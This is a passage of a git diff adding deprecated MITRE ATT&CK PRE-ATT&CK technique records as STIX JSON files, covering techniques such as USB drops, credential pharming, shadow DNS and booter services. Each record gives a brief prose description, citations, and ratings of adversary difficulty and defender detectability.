replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1379).\n\nRemovable media containing malware can be injected in to a supply chain at large or small scale. It can also be physically placed for someone to find or can be sent to someone in a more targeted manner. The intent is to have the user utilize the removable media on a system where the adversary is trying to gain access. (Citation: USBMalwareAttacks) (Citation: FPDefendNewDomain) (Citation: ParkingLotUSB)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1379", + "external_id": "T1379" + }, + { + "source_name": "USBMalwareAttacks", + "description": "Sean Carroll. (2010, November 4). USB Malware Attacks On the Rise. Retrieved March 9, 2017." + }, + { + "source_name": "FPDefendNewDomain", + "description": "William J. Lynn III. (2010, September). Defending a New Domain. Retrieved March 9, 2017." + }, + { + "source_name": "ParkingLotUSB", + "description": "Emil Protalinski. (2012, July 11). Criminals push malware by 'losing' USB sticks in parking lots. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "From a technical perspective, detection of an adversary disseminating removable media is not possible as there is no technical element involved until the compromise phase. Most facilities generally do not perform extensive physical security patrols, which would be necessary in order to promptly identify an adversary deploying removable media to be used in an attack.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Commonly executed technique by penetration testers to gain access to networks via end users who are innately trusting of newly found or available technology.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1156", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2fc04aa5-48c1-49ec-919a-b88241ef1d17.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2fc04aa5-48c1-49ec-919a-b88241ef1d17.json new file mode 100644 index 0000000000000000000000000000000000000000..b0cc8394540b60b09c3125f3fac9b52fb2125e88 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2fc04aa5-48c1-49ec-919a-b88241ef1d17.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--b9d93568-a65f-4769-b59f-b8cf110992af", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2fc04aa5-48c1-49ec-919a-b88241ef1d17", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Spear phishing messages with text only", + "description": "**This technique has been deprecated. Please use [Phishing](https://attack.mitre.org/techniques/T1566) where appropriate.**\n\nEmails with text only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm existence of an account or user. (Citation: Paypal Phone Scam)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1368", + "url": "https://attack.mitre.org/techniques/T1368" + }, + { + "description": "Sophos Labs. (2006, July 7). PayPal phone phish scam uses voice recording to steal money. Retrieved March 29, 2017.", + "source_name": "Paypal Phone Scam" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:26:25.555Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1145", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Sending messages with text only should be accepted in most cases (e.g., not being filtered based on source, content).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "End user training and awareness is the primary defense for flagging a plain text email so the end user does not respond or take any requested action (e.g., calling a designated number).", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3160347f-11ac-44a3-9640-a648b3c17a8f.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3160347f-11ac-44a3-9640-a648b3c17a8f.json new file mode 100644 index 0000000000000000000000000000000000000000..a7d6dfaccbce569bbb20a710593e84e60facb23e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3160347f-11ac-44a3-9640-a648b3c17a8f.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--a4a6c0d3-16bf-49d0-8e70-07cff5d5d0fd", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--3160347f-11ac-44a3-9640-a648b3c17a8f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Private whois services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1305).\n\nEvery domain registrar maintains a publicly viewable database that displays contact information for every registered domain. Private 'whois' services display alternative information, such as their own company data, rather than the owner of the domain. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1305", + "external_id": "T1305" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Algorithmically possible to detect COTS service usage or use of non-specific mailing addresses (PO Boxes, drop sites, etc.)", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Commercially available or easy to set up and/or register using a disposable email account.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1082", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--31a57c70-6709-4d06-a473-c3df1f74c1d4.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--31a57c70-6709-4d06-a473-c3df1f74c1d4.json new file mode 100644 index 0000000000000000000000000000000000000000..ad8cb940de4349a9815bbc19589f143f2509e1da --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--31a57c70-6709-4d06-a473-c3df1f74c1d4.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--01768190-ce05-4ceb-9826-694d85161a4e", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--31a57c70-6709-4d06-a473-c3df1f74c1d4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess security posture of physical locations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1302).\n\nPhysical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1302", + "external_id": "T1302" + }, + { + "source_name": "CyberPhysicalAssessment", + "description": "Doug MacDonald, Samuel L Clements, Scott W Patrick, Casey Perkins, George Muller, Mary J Lancaster, Will Hutton. (2013, February). Cyber/physical security vulnerability assessment integration. Retrieved March 6, 2017." + }, + { + "source_name": "CriticalInfrastructureAssessment", + "description": "J. Depoy, J. Phelan, P. Sholander, B. Smith, G.B. Varnado and G. Wyss. (2015). RISK ASSESSMENT for PHYSICAL AND CYBER ATTACKS on CRITICAL INFRASTRUCTURES. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Physical security is often unaware of implications of physical access to network. However, some organizations have thorough physical security measures that would log and report attempted incursions, perimeter breaches, unusual RF at a site, etc.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Social engineering and OSINT are still generally successful. Physical locations of offices/sites are easily determined. Monitoring for other sites of interest, such as backup storage vendors, is also easy to accomplish.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1079", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--31fa5b03-1ede-4fab-8a68-ed831fcf4899.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--31fa5b03-1ede-4fab-8a68-ed831fcf4899.json new file mode 100644 index 0000000000000000000000000000000000000000..09c9a3010b2cf41d2b95ec7cf157d6725e5c0e30 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--31fa5b03-1ede-4fab-8a68-ed831fcf4899.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--eae4beb9-4e3b-466e-9013-48a824b0e6c3", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--31fa5b03-1ede-4fab-8a68-ed831fcf4899", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Misattributable credentials", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1322).\n\nThe use of credentials by an adversary with the intent to hide their true identity and/or portray them self as another person or entity. An adversary may use misattributable credentials in an attack to convince a victim that credentials are legitimate and trustworthy when this is not actually the case. (Citation: FakeSSLCerts)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1322", + "external_id": "T1322" + }, + { + "source_name": "FakeSSLCerts", + "description": "Paul Mutton. (2014, February 12). Fake SSL certificates deployed across the internet. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "If a previous incident identified the credentials used by an adversary, defenders can potentially use these credentials to track the adversary through reuse of the same credentials.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can easily create and use misattributable credentials to obtain servers, build environment, [https://aws.amazon.com AWS] accounts, etc. Many service providers require some form of identifiable information such as a phone number or email address, but there are several avenues to acquire these consistent with the misattributable identity.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1099", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--34450117-d1d5-417c-bb74-4359fc6551ca.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--34450117-d1d5-417c-bb74-4359fc6551ca.json new file mode 100644 index 0000000000000000000000000000000000000000..3046a7e89ca6c6e257f200200f4a0bc75e4a09ad --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--34450117-d1d5-417c-bb74-4359fc6551ca.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--99f15f2c-8633-4757-811f-b1fa45f55c21", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--34450117-d1d5-417c-bb74-4359fc6551ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze presence of outsourced capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1303).\n\nOutsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. (Citation: Scasny2015) (Citation: OPM Breach)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1303", + "external_id": "T1303" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + }, + { + "source_name": "OPM Breach", + "description": "Hon. Jason Chaffetz, Hon. Mark Meadows, Hon. Will Hurd. (2016, September 7). The OPM Data Breach: How the Government Jeopardized Our National Security for More than a Generation. Retrieved March 28, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Much of this analysis can be done using the target's open source website, which is purposely designed to be informational and may not have extensive visitor tracking capabilities.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Analyzing business relationships from information gathering may provide insight into outsourced capabilities. In certain industries, outsourced capabilities or close business partnerships may be advertised on corporate websites.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1080", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--357e137c-7589-4af1-895c-3fbad35ea4d2.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--357e137c-7589-4af1-895c-3fbad35ea4d2.json new file mode 100644 index 0000000000000000000000000000000000000000..a42b58e613fb06ba78d072083b910564aac076de --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--357e137c-7589-4af1-895c-3fbad35ea4d2.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--2d9c1fd5-ea97-40fe-ac69-cf58ca0d105e", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--357e137c-7589-4af1-895c-3fbad35ea4d2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate or encrypt code", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1319).\n\nObfuscation is the act of creating code that is more difficult to understand. Encoding transforms the code using a publicly available format. Encryption transforms the code such that it requires a key to reverse the encryption. (Citation: CylanceOpCleaver)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1319", + "external_id": "T1319" + }, + { + "source_name": "CylanceOpCleaver", + "description": "CYLANCE. (n.d.). Operation Cleaver. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Detecting encryption is easy, decrypting/deobfuscating is hard.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Various solutions exist for the adversary to use. This technique is commonly used to prevent attribution and evade detection.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1096", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--388f3a5c-2cdd-466c-9159-b507fa429fcd.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--388f3a5c-2cdd-466c-9159-b507fa429fcd.json new file mode 100644 index 0000000000000000000000000000000000000000..e78e8547e1c685ad1c101a25bbc3d6e9e18b38b3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--388f3a5c-2cdd-466c-9159-b507fa429fcd.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--f9d872e0-af4c-4f2f-838a-43fb08510188", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--388f3a5c-2cdd-466c-9159-b507fa429fcd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Hardware or software supply chain implant", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1365).\n\nDuring production and distribution, the placement of software, firmware, or a CPU chip in a computer, handheld, or other electronic device that enables an adversary to gain illegal entrance. (Citation: McDRecall) (Citation: SeagateMaxtor)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1365", + "external_id": "T1365" + }, + { + "source_name": "McDRecall", + "description": "Tash Shifrin. (2006, October 16). Malware forces McDonald\u2019s recall of giveaway MP3s. Retrieved March 9, 2017." + }, + { + "source_name": "SeagateMaxtor", + "description": "Brandon Hill. (2007, November 14). Seagate Serves External HDDs with a Side of Virus. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The number of elements and components in a supply chain of HW or SW is vast and detecting an implant is complex for SW, but more complex for HW.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Access to the supply chain by an adversary can be a challenging endeavor, depending on what element is attempting to be subverted.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1142", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--38a6d2f5-d948-4235-bb91-bb01604448b4.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--38a6d2f5-d948-4235-bb91-bb01604448b4.json new file mode 100644 index 0000000000000000000000000000000000000000..5b3c43a1f4545f13bbdad61502dfca3396b01de3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--38a6d2f5-d948-4235-bb91-bb01604448b4.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--19d4578e-9553-40f4-b7d7-cb5dd3c06d08", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--38a6d2f5-d948-4235-bb91-bb01604448b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Credential pharming", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nCredential pharming a form of attack designed to steal users' credential by redirecting users to fraudulent websites. Pharming can be conducted either by changing the hosts file on a victim's computer or by exploitation of a vulnerability in DNS server software. (Citation: DriveByPharming) (Citation: GoogleDrive Phishing)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1374", + "url": "https://attack.mitre.org/techniques/T1374" + }, + { + "description": "Ellen Messmer. (2008, January 22). First case of \"drive-by pharming\" identified in the wild. Retrieved March 2, 2017.", + "source_name": "DriveByPharming" + }, + { + "description": "Nick Johnston. (2014, March 13). Google Docs Users Targeted by Sophisticated Phishing Scam. Retrieved March 29, 2017.", + "source_name": "GoogleDrive Phishing" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:18:16.035Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1151", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Although it can be difficult to spoof/redirect content to a hostile service via DNS poisoning or MiTM attacks, current malware such as Zeus is able to successfully pharm credentials and end users are not well-versed in checking for certificate mismatches.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Fidelity of networking monitoring must be able to detect when traffic is diverted to non-normal sources at a site level. It is possible to identify some methods of pharming, but detection capabilities are limited and not commonly implemented.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3d1488a6-59e6-455a-8b80-78b53edc33fe.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3d1488a6-59e6-455a-8b80-78b53edc33fe.json new file mode 100644 index 0000000000000000000000000000000000000000..6e97d42e418b831aff54af00dc3e262d15e532be --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3d1488a6-59e6-455a-8b80-78b53edc33fe.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--0f147bb6-4652-4f1c-b0b9-e909147272d7", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--3d1488a6-59e6-455a-8b80-78b53edc33fe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain booter/stressor subscription", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1396).\n\nConfigure and setup booter/stressor services, often intended for server stress testing, to enable denial of service attacks. (Citation: Krebs-Anna) (Citation: Krebs-Booter) (Citation: Krebs-Bazaar)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1396", + "external_id": "T1396" + }, + { + "source_name": "Krebs-Anna", + "description": "Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai Worm Author?. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/" + }, + { + "source_name": "Krebs-Booter", + "description": "Brian Krebs. (2016, October 27). Are the Days of \u201cBooter\u201d Services Numbered?. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/" + }, + { + "source_name": "Krebs-Bazaar", + "description": "Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service Bazaar. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1173", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Easily accessible and used to launch DDoS attacks by even novice Internet users, and can be purchased from providers for a nominal fee, some of which even accept credit cards and PayPal payments to do.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Purchase of booster services is not observable; potentially can trace booster service used to origin of sale, yet not before attack is executed. Furthermore, subscription does not automatically mean foul intention.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3f157dee-74f0-41fc-801e-f837b8985b0a.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3f157dee-74f0-41fc-801e-f837b8985b0a.json new file mode 100644 index 0000000000000000000000000000000000000000..5d0147314d985baa10162a2e1c8f5e893fe3cdda --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3f157dee-74f0-41fc-801e-f837b8985b0a.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--8b2fff14-9376-4a8e-91f2-1449e3a1ab47", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--3f157dee-74f0-41fc-801e-f837b8985b0a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Shadow DNS", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1340).\n\nThe process of gathering domain account credentials in order to silently create subdomains pointed at malicious servers without tipping off the actual owner. (Citation: CiscoAngler) (Citation: ProofpointDomainShadowing)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1340", + "external_id": "T1340" + }, + { + "source_name": "CiscoAngler", + "description": "Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.", + "url": "https://blogs.cisco.com/security/talos/angler-domain-shadowing" + }, + { + "source_name": "ProofpointDomainShadowing", + "description": "Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1117", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "To successfully conduct this attack, an adversary usually phishes the individual behind the domain registrant account, logs in with credentials, and creates a large amount of subdomains.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Detection of this technique requires individuals to monitor their domain registrant accounts routinely. In addition, defenders have had success with blacklisting sites or IP addresses, but an adversary can defeat this by rotating either the subdomains or the IP addresses associated with the campaign.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--41086474-e6de-4fac-bb69-640db7fdf3d2.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--41086474-e6de-4fac-bb69-640db7fdf3d2.json new file mode 100644 index 0000000000000000000000000000000000000000..3dac7e936269af67a901b798953113995a794f03 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--41086474-e6de-4fac-bb69-640db7fdf3d2.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--da15c19f-e841-442a-acf3-ed40d68dac2e", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--41086474-e6de-4fac-bb69-640db7fdf3d2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Runtime code download and execution", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nMany mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). These app stores scan submitted applications for malicious behavior. However, applications can evade these scans by downloading and executing new code at runtime that was not included in the original application package. (Citation: Fruit vs Zombies) (Citation: Android Hax) (Citation: Execute This!) (Citation: HT Fake News App) (Citation: Anywhere Computing kill 2FA) (Citation: Android Security Review 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1395", + "url": "https://attack.mitre.org/techniques/T1395" + }, + { + "description": "Claud Xiao. (2016). Fruit vs Zombies: Defeat Non-jailbroken iOS Malware. Retrieved April 12, 2017.", + "source_name": "Fruit vs Zombies" + }, + { + "description": "Jon Oberheide. (2010). Android Hax. Retrieved April 12, 2017.", + "source_name": "Android Hax" + }, + { + "description": "Sebastian Poeplau, Yanick Fratantonio, Antonio Bianchi, Christopher Kruegel, 